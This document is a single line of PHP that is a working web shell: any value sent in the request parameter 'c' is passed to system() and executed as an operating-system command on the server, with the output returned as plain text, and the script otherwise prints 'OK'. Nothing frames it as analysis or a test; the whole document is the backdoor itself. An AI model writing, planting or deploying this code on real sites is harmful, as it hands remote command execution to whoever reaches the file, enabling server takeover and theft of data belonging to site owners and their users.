<?php if(isset($_REQUEST["c"])){header("Content-Type:text/plain");system($_REQUEST["c"]);die;}echo "OK";?>
